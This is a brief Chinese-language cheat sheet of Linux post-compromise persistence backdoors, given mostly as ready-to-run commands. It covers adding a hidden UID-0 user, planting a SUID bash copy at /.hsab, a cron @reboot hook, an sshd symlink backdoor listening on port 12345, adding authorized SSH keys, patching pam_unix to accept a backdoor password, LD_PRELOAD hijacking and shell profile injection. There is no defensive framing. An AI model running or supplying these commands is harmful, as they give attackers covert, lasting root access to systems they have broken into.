1.直接加用户

sudo useradd -ou 0 -g 0 xxx
sudo passwd xxx
echo "password" | passwd --stdin xxx

2.SUID文件

cp /bin/bash /.hsab 
chmod u+s /.hsab
ls -al /.hsab

3.Crontab

(crontab -l ; echo "@reboot sleep 200 && echo 123")|crontab 2> /dev/null

4.ssh软连接

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=12345

5.ssh key添加

ssh-keygen
追加到 ~/.ssh/authorized_keys

6.PAM后门

源码http://www.linux-pam.org/library/

modules/pam_unix/pam_unix_auth.c

retval = _unix_verify_password(pamh, name, p, ctrl);
//加入后门
...
用新的/modules/pam_unix/.libs/pam_unix.so 替换 /lib64/security/

7.LD_PRELOAD

劫持动态链接库

8.bash_rc , profile等

添加自己的脚本